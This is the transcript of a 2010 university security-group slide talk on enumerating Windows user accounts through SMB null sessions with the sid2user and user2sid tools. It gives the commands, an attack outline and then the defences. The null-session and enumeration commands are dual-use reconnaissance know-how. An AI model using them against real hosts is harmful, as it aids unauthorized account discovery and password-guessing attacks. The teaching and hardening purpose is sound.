Presentation is loading. Please wait.

Presentation is loading. Please wait.

Mitchell Adair Computer Security Group Feb. 10th, 2010 Enumerating Windows Users.

Published byAbner Nicholson Modified over 7 years ago

Similar presentations

Presentation on theme: "Mitchell Adair Computer Security Group Feb. 10th, 2010 Enumerating Windows Users."— Presentation transcript:

1 Mitchell Adair Computer Security Group Feb. 10th, 2010 Enumerating Windows Users

2 Outline Purpose Quick Review The Old (Win2k) The New (XP and above) What is a SID? sid2user user2sid Attack Outline How do we prevent this? Demo More Info

3 Purpose Enumerate Users Password guessing Social engineering It's just useful... If we can do it, so can the bad guys We'll go over how to prevent this shortly... but first let's make sure it works ;)

4 Quick Review We'll be using SMB null sessions So first... a little background SMB = Server Message Block File sharing Printing over a network etc... TCP port 445

5 ...Quick Review You can create an SMB connection with a user account, but - you can create a null session User “” Pass “” Allowed by default C:\> net use \\host “pass” /u:”user” C:\> net use \\192.168.69.2 “” /u:”” The command completed successfully. Now... direct queries to remote hosts API

6 The Old (Win2k) By default, Win2k relies on SMB SMB includes an API Return computer info through ports 139 and 445 With Win2k, you can just pull user accounts. First, establish a null SMB session Then, remotely access API Network info, shares, users, groups, registry keys... Obviously... this is way too much info

7 ...The Old (Win2k)

8 The New (XP and above) So they got a little smarter... and the default settings no longer permit this. “The RestrictAnonymous registry value was introduced in Microsoft Windows NT 4.0 Service Pack 3 (SP3) and is now included with Windows 2000.” - microsoft.com But, let's take a closer look...

9 ...The New (2k3 and above) RestrictAnonymous has 3 values 0 – anonymous connections can enumerate … 1 - anonymous connections can not enumerate... 2 – no anonymous connections are possible “Note Even with the RestrictAnonymous registry value set to 1, there are Win32 programming interfaces that do not restrict anonymous connections. Therefore, tools that use these interfaces can still enumerate information over a null session even when the RestrictAnonymous registry value is set to 1.” - microsoft.com

10 What is a SID? SID = Security Identifier Users reference account name OS internally references a SID users, groups, and more... unique, never reused Domain accounts, accompanied by RID (Relative Identifier) Identifies a particular account or group Domain accounts SID = SID + RID SID of the domain, concatenated with account RID

11 ...What is a SID? S-1-5-32-544 This SID has four components: revision level, identifier authority, domain identifier A relative identifier 1-5-32 collectively identify a domain The last value, 544, is the Relative Identifier (RID) 500 – Administrator 501 – Guest 1001 and up – User accounts

12 sid2user Makes a different API call than the one blocked by RestrictAnonymous Performs WIN32 function LookupSidName Takes a SID, returns a user account Surely, If they know the SID, they're trustworthy sid2user.exe \\host [SID] [RID] sid2user.exe \\anonymous ## ## ## 500

13 user2sid But oh noes... we need the SID! Takes an account name, returns the SID Performs WIN32 function LookupAccountName There are well known account names... administrator, “domain users”, guest, etc... user2sid.exe \\host user2sid.exe \\anonymous guest

14 Attack Outline 1. Establish a null session 2. Use user2sid to find the SID 3. Use sid2user to iterate through known RIDs 4. You now know all the accounts on the box... ● First, let's see how to prevent this … then we'll do a quick demo :)

15 How do we prevent this? Block ports at the firewall SMB traffic shouldn't be leaving the network Block ports on the host May affect compatibility with clients, servers, apps. XP and above secpol.msc Network access: Allow anonymous SID / Name translation → Disabled Network access: Do not allow anonymous enumeration of SAM accounts → Enabled

16 DEMO

17 More Info The author of the tools http://evgenii.rudnyi.ru/soft/sid/ “How Security Identifiers Work” http://technet.microsoft.com/en- us/library/cc778824%28WS.10%29.aspx Google sid2user, user2sid Windows SID etc...

Download ppt "Mitchell Adair Computer Security Group Feb. 10th, 2010 Enumerating Windows Users."

Similar presentations

Ethical Hacking Module IV Enumeration.

Ethical Hacking Module IV Enumeration.
Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.

Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Raw Sockets CS-480b Dick Steflik Raw Sockets Raw Sockets let you program at just above the network (IP) layer You could program at the IP level using.

Raw Sockets CS-480b Dick Steflik Raw Sockets Raw Sockets let you program at just above the network (IP) layer You could program at the IP level using.
Network Shares and Accounts Sharing Printers, Drives, Folders – Setup Windows 95/98 Windows NT (2000, XP) Linux – Users – Groups.

Network Shares and Accounts Sharing Printers, Drives, Folders – Setup Windows 95/98 Windows NT (2000, XP) Linux – Users – Groups.
Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost 127.0.0.1 (loopback address)  Internal networks 

Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost (loopback address)  Internal networks 
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
1 Chapter Overview Creating User and Computer Objects Maintaining User Accounts Creating User Profiles.

1 Chapter Overview Creating User and Computer Objects Maintaining User Accounts Creating User Profiles.
Principles of Computer Security: CompTIA Security + ® and Beyond, Second Edition © 2010 Baselines Chapter 14.

Principles of Computer Security: CompTIA Security + ® and Beyond, Second Edition © 2010 Baselines Chapter 14.
Chapter 8 Hardening Your SQL Server Instance. Hardening  Hardening The process of making your SQL Server Instance more secure  New features Policy based.

Chapter 8 Hardening Your SQL Server Instance. Hardening  Hardening The process of making your SQL Server Instance more secure  New features Policy based.
Chapter 6 Enumeration Modified 9-28-09. Objectives  Describe the enumeration step of security testing  Enumerate Microsoft OS targets  Enumerate NetWare.

Chapter 6 Enumeration Modified Objectives  Describe the enumeration step of security testing  Enumerate Microsoft OS targets  Enumerate NetWare.
Module 7: Configuring TCP/IP Addressing and Name Resolution.

Module 7: Configuring TCP/IP Addressing and Name Resolution.
Chapter 4 Windows NT/2000 Overview. NT Concepts  Domains –A group of one or more NT machines that share an authentication database (SAM) –Single sign-on.

Chapter 4 Windows NT/2000 Overview. NT Concepts  Domains –A group of one or more NT machines that share an authentication database (SAM) –Single sign-on.
Hands-On Ethical Hacking and Network Defense

Hands-On Ethical Hacking and Network Defense
Remote Desktop Services Remote Desktop Connection Remote Desktop Protocol Remote Assistance Remote Server Administration T0ols.

Remote Desktop Services Remote Desktop Connection Remote Desktop Protocol Remote Assistance Remote Server Administration T0ols.
6.1 © 2004 Pearson Education, Inc. Exam 70-290 Managing and Maintaining a Microsoft® Windows® Server 2003 Environment Lesson 6: Administering User Accounts.

6.1 © 2004 Pearson Education, Inc. Exam Managing and Maintaining a Microsoft® Windows® Server 2003 Environment Lesson 6: Administering User Accounts.
CS391 Computer & Network Security

CS391 Computer & Network Security
The Microsoft Baseline Security Analyzer A practical look….

The Microsoft Baseline Security Analyzer A practical look….
Windows Security. Security Windows 2000/XP Professional security oriented Authentication Authorization Internet Connection Firewall.

Windows Security. Security Windows 2000/XP Professional security oriented Authentication Authorization Internet Connection Firewall.
October 8, 2015 University of Tulsa - Center for Information Security Microsoft Windows 2000 DNS October 8, 2015.

October 8, 2015 University of Tulsa - Center for Information Security Microsoft Windows 2000 DNS October 8, 2015.

Similar presentations

Ads by Google